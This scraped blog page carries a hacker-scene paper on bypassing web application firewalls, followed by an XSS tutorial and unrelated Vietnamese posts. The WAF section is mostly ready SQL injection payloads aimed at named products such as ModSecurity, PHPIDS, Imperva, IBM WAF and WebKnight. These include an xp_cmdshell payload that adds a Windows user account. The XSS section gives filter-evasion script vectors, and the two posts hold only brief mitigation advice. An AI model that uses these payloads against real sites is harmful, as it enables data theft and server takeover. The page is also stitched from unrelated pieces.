[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++

Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful.
However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users
when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.


Keyword filer: and, or
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or)/i', $id)

THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1
----------------------------------------------------------------------


Keyword filer: and, or, union
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union)/i', $id)

The keyword union is generally used to generate an malicious statement in order to select extra data from the database.

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement
e.g. use substring function to get each character of table names.
----------------------------------------------------------------------


Keyword filer: and, or, union, where
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, '
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
----------------------------------------------------------------------


From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions.
Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.

Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.


+++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - Bypass Regular Expression Filtering
+++++++++++++++++++++++++++++++++++++++++++++++

Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server.
However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.

PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols.

[Code]---------------------------------------------------------------
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
[End Code]-----------------------------------------------------------

[Code]---------------------------------------------------------------
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
[End Code]-----------------------------------------------------------



########################################
[0x02] - Normally Bypassing Techniques
########################################

In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application,
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers.
Some modern WAF systems work both with attack signatures and abnormal behavior.

Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!


1. Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
[End Code]-----------------------------------------------------------


2. Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter: /union\sselect/g

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
[End Code]-----------------------------------------------------------


3. Replaced keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
[End Code]-----------------------------------------------------------

Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
[End Code]-----------------------------------------------------------

For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/".

Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html



4. Character encoding

Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so
double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep
decoding the SQL statement executing

[Code]-----------------------------------------------------------------------------------------------------------------
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
[End Code]-------------------------------------------------------------------------------------------------------------

Moreover, these techniques can combine to bypass Citrix Netscaler
- Remove all "NULL" words
- Use query encoding in some parts
- Remove the single quote character "'"
- And Have fun !!
Credit: Wendel Guglielmetti Henrique

and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character.


#Real World Example

1. NukeSentinel (Nuke Evolution)

[Nukesentinel.php Code]------------------------------------------------------------
// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
if (stristr($nsnst_const['query_string'],'+union+') OR \
stristr($nsnst_const['query_string'],'%20union%20') OR \
stristr($nsnst_const['query_string'],'*/union/*') OR \
stristr($nsnst_const['query_string'],' union ') OR \
stristr($nsnst_const['query_string_base64'],'+union+') OR \
stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
die("BLOCK IP 1 " );
}
}
[End Code]-------------------------------------------------------------------------

We can bypass their filtering with these script:

Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


2. Mod Security CRS (Credit: Johannes Dahse)

[SecRule]--------------------------------------------------------------------------
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
[End Rule]-------------------------------------------------------------------------

We can bypass their filtering with this code:

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
[End Code]--------------------------------------------------------------------------

From this attack, We can bypass Mod Security rule. Let see what's happen !!

MySQL Server supports 3 comment styles:
- From a "#" character to the end of the line
- From a "--" sequence to the end of the line
- From a /* sequence to the following */ sequence, as in the C programming language.
This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
not be on the same line.

The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
The resulting SQL payload looked something like this:

0 div 1 union#foo*/*/bar
select#foo
1,2,current_user

However the SQL payload, when executed by the MySQL DB, looked something like this:

0 div 1 union select 1,2,current_user


5. Buffer Overflow

WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.
Give a large amount of data allows our code executing

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
[End Code]--------------------------------------------------------------------------


6. Inline Comments (Mysql Only)

From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write
code that includes MySQL extensions, but is still portable, by using comments of the following form:

/*! MySQL-specific code */

In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
but other SQL servers will ignore the extensions.

A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
[End Code]--------------------------------------------------------------------------

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can
add more inline comments

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
[End Code]--------------------------------------------------------------------------



########################################
[0x03] - Advanced Bypassing Techniques
########################################

In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination".
From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)


++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - HTTP Parameter Pollution: Split and Join
++++++++++++++++++++++++++++++++++++++++++++++++++++

HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting
query string.

Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

HTTP Parameter Handling: (Example)

+------------------------------------------------------------------+
| Web Server | Parameter Interpretation | Example |
+------------------------------------------------------------------+
| ASP.NET/IIS | Concatenation by comma | par1=val1,val2 |
| ASP/IIS | Concatenation by comma | par1=val1,val2 |
| PHP/Apache | The last param is resulting | par1=val2 |
| JSP/Tomcat | The first param is resulting | par1=val1 |
| Perl/Apache | The first param is resulting | par1=val1 |
| DBMan | Concatenation by two tildes | par1=val1~~val2 |
+------------------------------------------------------------------+

What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates
multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload.

In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:


#Real World Example:

1. Mod Security CRS (Credit: Lavakumar Kuppan)

The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.

Forbidden: http://victim.com/search.aspx?q=select name,password from users

When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.

Bypassed : http://victim.com/search.aspx?q=select name&q=password from users


Let's see what's happen, ModSecurity's interpretation is

q=select name
q=password from users

ASP/ASP.NET's interpretation is
q=select name,password from users

*Tip: This attack can be carried out on a POST variable in a similar way


2. Commercial WAFs

Forbidden: http://victim.com/search.aspx?q=select name,password from users

Now we use HPP+Inline comment to bypass it.

Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users


Analyzing, WAF's interpretation is

q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/users

ASP/ASP.NET's interpretation is
q=select/*,*/name,password/*,*/from/*,*/users
q=select name,password from users


3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)

Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --

Now we use HPP+Inline comment to bypass it.

Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --


Analyzing, WAF's interpretation is

id=1’; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ “net user zeq3ul UrWaFisShiT” /*
id=1*/ --

ASP/ASP.NET's interpretation is
id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --


The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request.
This would prevent all variations of this attack.
However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters.
And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF
should also interpret the HTTP request in the same way the web application would.


++++++++++++++++++++++++++++++++++++++++
[0x03b] - HTTP Parameter Contamination
++++++++++++++++++++++++++++++++++++++++

HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by
exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string
parameter contamination with reserved or non expects characters.

Some facts:
- The term Query String is commonly used to refer to the part between the "?" and the end of the URI
- As defined in the RFC 3986, it is a series of field-value pairs
- Pairs are separated by "&" or ";"
- RFC 2396 defines two classes of characters:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `

Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations,
but we will stop here this time.

Query string and Web server response (Example)

+-----------------------------------------------------------+
| Query String | Web Servers response / GET values |
+-----------------------------------------------------------+
| | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
+-----------------------------------------------------------+
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test=1 | test=1 | test=1 |
| ?test=11 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |
+-----------------------------------------------------------+

Magic character "%" affect to ASP/ASP.NET

+--------------------------------------------------------------------+
| Keywords | WAF | ASP/ASP.NET |
+--------------------------------------------------------------------+
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
| <scr%ipt> | <scr%ipt> | <script> |
| <if%rame> | <if%rame> | <iframe> |
+--------------------------------------------------------------------+


#Real world examples:

1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf)

[Filtered]----------------------------------------------------------------------------------

[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b"
at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"]
[rev "2.2.0"] [msg "Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"]
[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]

[End Code]------------------------------------------------------------------------------

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell

2. Bypass URLScan 3.1 DenyQueryStringSequences rule

Forbidden: http://localhost/test.asp?file=../bla.txt
Bypassed : http://localhost/test.asp?file=.%./bla.txt

3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)

Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these
command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.


These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors.
HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform,
if there is WAF who blocks this kind of an attack.



######################################
[0x04] - How to protect your website
######################################

- Implement Software Development Life Cycle (SDLC)
- Secure Coding: Validate all inputs and outputs
- PenTest before online
- Harden it !!
- Revisit PenTest
- Deploy WAF (For Optional)
- Always check WAF patch


#####################
[0x05] - Conclusion
#####################

- WAFs is not the long-expected
- It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt WAF filter to the particular web app being protected
- WAF doesn't eliminate a vulnerability, It just partly screens the attack vector


#####################
[0x06] - References
#####################

[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com


####################
[0x07] - Greetz To
####################

Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx : Exploit-db.com


----------------------------------------------------
Our disclosure purpose isn't helping security products but need to reveal theirs shit.
Security Products not able to 100% protect from damn config/coding of admin.
Just need a time and imagination for breach it !!
----------------------------------------------------

Friday, September 28, 2012

XSS Hacking Exposed & Explained

 


XSS Hacking Exposed & Explained
By: magikh0e

'\v/`
(o 0) m0o.
(_) / www.IHackedThisBox.com

Work with the security community, not against it



0x1 T.O.C:
(0) Disclaimer
(0a) Credits
(1) XSS huh?, what the $#% is XSS?
(2) What can YOU do with XSS?
(3) Finding XSS vulnerabilities.
(4) Secure your site against XSS.
(5) Evading XSS detection.


This paper is currently being written.
Last edit Feb 6 2006.


0. (Disclaimer)
=================
IHackedThisBox or any of its members can not be held reliable for what you
do with the information learned in this article.

This article like any other IHTB release is intended to improve security,
not break it.

That being said use this information wisely, and dont be a dumbass.


0a. (Credits)
HUP
That guy from.. wait was he even real? wtf?!!?!
c0vert


1. (XSS huh, what the $#%! is XSS?)
======================================

Cross site scripting (XSS) is a type of computer security vulnerability typically found in
web applications which can be used by an attacker to compromise the same origin policy of
client-side scripting languages. Alot of webservers by default are also vulnerable to xss
attacks.

IE.
Novell Netware
--------------
Multiple extensions: .asp, .jsp, .htm, .html
http://novell_netware/nsn/"<script%20language=vbscript>msgbox%20VULN</script>".bas

Apache
---------
http://apache_host/cgi/example?test=<script>alert('xss')</script>


Note that although cross site scripting is also sometimes
abbreviated "CSS", it has nothing to do with the Cascading Style Sheets technology that is
more commonly called CSS.

The term cross site scripting is not a very accurate description of this class of vulnerability.

In the words of XSS pioneer Marc Slemko:

This issue isn't just about scripting, and there isn't necessarily anything cross site about it.
So why the name? It was coined earlier on when the problem was less understood, and it stuck.
Believe me, we have had more important things to do than think of a better name.




2. (What can YOU do with XSS?)
======================================

To date there are three known types of an XSS vulnerability.


Type 1.
---------
This XSS vulnerability is usually called a DOM-based or local XSS.
Type 1 XSS are issues located on server side scripting.


Type 2.
---------
Type 2 XSS is also called a reflected and/or non-persistent vulnerability. This is one of the most
common types of XSS attacks you will find. These types of XSS attacks are possible when user supplied
data is instantly used by server side scripts to generate a page, based on the users input.


Type 3.
---------
Type 3 XSS is also called second-order, stored, or persistent vulnerabilities. Type 3 can have
the most impact out of an XSS vulnerability. Attacks classified in Type 3 will exist when a
user inputs data provided, to a web app. Next the data is stored persistently on the server in
a database of some sort. This data is later displayed to a user on the web page. Feel the need
to eat someones c00kies?


Wow mom! Look I know about XSS, but what can I do with it? And how do I defend against it?!?!?




3. (Finding vulnerable XSS applications)
==============================================

XSS vulnerabilities are very easy to find and exploit.
Alot of administrators & developers simply ignore XSS.

This is usually for one of two reasons.
1. They do not fully understand the impact of XSS vulnerabilities and simply do not bother.
2. They think XSS is not a big deal..

The first steps to finding XSS vulnerabilities in an application is by examining all error messages closely
given by the server. Many times when you request a file from the server that is not there, the server returns
a page with blah blah filename in quotes stating file not found. Interesting enough lets play around with this.



Basic XSS Examples:

Below is a simple test for XSS vulnerability.
If a message box appears with the words XSS,
b00m the site is vulnerable.

<script>alert("XSS")</script>

Some web servers require the ending "/".
<script>alert('XSS')</script>/

Single quotes sometimes help..
<script>alert('XSS')</script>


Overflow attempt for an XSS attack:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>


Search engines are also a fun place to start out testing for XSS vulnerabilities within your site.
In your journey of XSS hax0ring you will find that quite alot of XSS attacks stem from the search
functions within your site. Always remember, anything that accepts user input has the chance of
being vulnerable to an XSS attack.

Some examples below of search engine XSS attacks:
search.php?query=<script>alert('XSS')</script>
search.php?query="><script>alert('XSS')</script>
search.php?query='><script>alert('XSS')</script>


Well, now that we have learned a few different ways to exploit XSS,
how about we move onto securing your site against XSS.

Away we go.......




4. (Secure your site against XSS).
======================================
4a. Filtering techniques.
4b. Mod-Security.

95% of XSS attacks can be avoidable when the developer uses proper filtering on ANY user supplied data.
Making sure every single element supplied by a user is properly sanitized and filtered can be easy in
small environments. However this can become a tedious task to accomplish, especially in legacy and very
large web applications.

Never fear, we have some help for this as well and it does not involve re-evaulation of all the code.
We have a band-aid for you! ModSecurity, we will cover this more soon.



Well if 95% is avoidable, what about the other 5% ? Good question.

In a non perfect world in which we live, you must accept that a web or any application can be a huge
confusing, tangled puzzle. This much confusion along with code can be a very tedious task to edit and
secure every single line. Not one person can catch every single attack or vulnerability.

Hacker technology is very fast. There is no way to re-evaluate everything as the technology emerges
and new concepts arise. Nothing is a sure thing; well except the author of this paper is handsome,
and sexy! HAH you are paying attention. nothing else to see here.. Read on..




Guidelines to follow for protecting your site against XSS
==========================================================

1.) Filter ALL user input: Filter, filter filter.
The reason XSS attacks are mainly possible is BAD user input filtering!

2.) Use existing scripting language functions.
Alot of scripting languages already have built in functions for filtering input, use them!

PHP functions: htmlentities(), strip_tags(), utf8_decode() can assist in writing filtering logic.
Why re-invent the wheel and write your own function to make sure HTML is encoded properly when
we can use htmlentities()?

3.) Allow only safe content 'content that pertains to your app'
Filter for content you WANT. Its better idea to drop 1 piece of information you want, than to allow
one evil character in.

4.) Use YOUR Brain.
When you are the developer of a web application, you will have a much better understanding of the
applications internals and how the app works. Keep in mind hackers are always out to exploit your app.
Trust nothing, always wear tin foil on your head to stop there evil signals.

<!--fill in the rest with your brain here--->

<!--end fill in your brain--->


Ok all this sounds really great, but as you know that re-evaluating a large code base has many issues
within it's self. Auditing and editing code can be very daunting and time consuming.

Have no fear not apache users.
There is a very nice apache module available called Mod-Security.
quote from modsecurity.org:

" ModSecurity(TM) is an open source intrusion detection and prevention engine for web applications (or a
web application firewall).

Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase
web application security, protecting web applications from known and unknown attacks. "

I am not going to go through the whole bit of compiling apache with modules etc etc.
That is another tutorial in its self. So assuming all is ready to rock, below is
some examples of configuring modsecurity to block XSS attacks/attempts.

Although it will allow commonly used HTML tags, this filter works fairly well.

SecFilter "<( |\n)*script"



If you wish to completely stop XSS attacks with some risk of breaking functionality,
use the following filter to block all html and javascript related attacks.

SecFilter "<(.|\n)+>"



Modsecurity also works well in providing quick & dirty SQL injection protection.

SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

Again another tutorial, but a nice piece of information in relation to..




5. (Evading XSS detection)
=============================
Well now that we have learned about XSS, what it is and how it works, best of
all and most important is how to defend your site against XSS. Now let's move on...

Now we take a look at some techniques an attacker can use to bypass filtering
measures and different methods of detecting and responding to such attacks.

The best way to stop XSS attacks is with proper input filtering.
Oh yea, these are humans writing these filters. People often get
lazy and errors, or let us call them "un-expected features" sometimes
slip into a piece of code.


In this section we will cover ways to by pass some anti xss security measures.


Scenario 1:
Imagine a site with a developer that has created all of her filters for
standard xss stuff, ", ' <,> so on.

Now let's think of the way a search engine works. You input some data into a textbox,
hit search and then the results are displayed. Here is the interesting part, what if
we search for a file that we know does not exist?
We get a message similar to "This filename was not found."

Hmmm..... clickty click lcik......

So lets try to see how we can trick this.
Note: ModSecurity has been tested to block these.




Bypass basic xss filtering using eval() fromCharCode for the vector.
This is a simple attack to use when any sort of quote is filtered:

';!--<SCRIPT>alert(String.fromCharCode(73,72,84,66))</SCRIPT>=&{}
"non php applications usually do not require the ';"

In this example we use no sort of ", ' so no filterage there.
We also use javascript to print the characters or code we wish
to display/run on the server.
The XSS will then run properly and the search page displays the
message, " !--=&{} was not found..." weeeee (=



Bypass xss filtering using html entities for quotes and an image tag to hold the XSS fun:
<IMG SRC=javascript:alert(&quot;IHTB&quot;)>



Bypass xss filters using grave accent obfuscation:
<IMG SRC=`javascript:alert("IHTB says, 'm0o'")`>



Bypassing XSS detection by encoding your actual xss attack with UTF-8 encoding
is also another example. If all else fails, you can always try to use long UTF-8
unicode without semicolons. You will find that this works quite often since alot
of people do not know how to pad up to 7 numeric characters, or for the
people who like to decode certain strings. Either way have fun!






--------------------------------------------------------------------------------
___
___ /__/\ ___ _____
/ /\ \ \:\ / /\ / /::\
/ /:/ \__\:\ / /:/ / /:/\:\
/__/::\ ___ / /::\ / /:/ / /:/~/::\
\__\/\:\__ /__/\ /:/\:\ / /::\ /__/:/ /:/\:|
\ \:\/\ \ \:\/:/__\/ /__/:/\:\ \ \:\/:/~/:/
\__\::/ \ \::/ \__\/ \:\ \ \::/ /:/
/__/:/ \ \:\ \ \:\ \ \:\/:/
\__\/ \ \:\ \__\/ \ \::/ D0t
\__\/ \__\/ org

Thursday, September 27, 2012

Wednesday, September 26, 2012

Video book khổng lồ về lập trình và tin học

Bộ video book tổng hợp khá đầy đủ các giáo trình về tin học, lập trình. Trong link có giáo trình PHP, C, SQL... và còn rất rất nhiều nữa anh em mở link ra xem sẽ rõ. Giáo trình được thực hiện bằng video nên dễ hiểu và trực quan hơn đọc ebook.
Share cho anh em nhất là các anh em đang bắt đầu học code.
Link download:
http://www.mediafire.com/?t1ze73nafc37q

Đời UG :::: Đam mê – Tiền Và Gái ::: [Part 2] – End

Part 2  (End)
11. toan9x
Năm lớp 7 bắt đầu biết ra quán net, thấy người ta vào internet, thì cũng đú đởn mà vào.
Vào site cuaqr họ sao mà thấy đẹp quá, thì vào google gõ từ : ” cách lập web”. Lúc đó, mới tập làm site với easyvn.com
Rồi sau đó, thấy cái link của mình nó dài quá, thế là lại google : “tên miền”
>> lần đầu tiên biết đến Register. Vào đó cũng reg 1 acc như người, nhưng đến phần điền CC, ko biết CC là gì, cứ ấn next, mà nó ko cho qua >> từ bỏ.
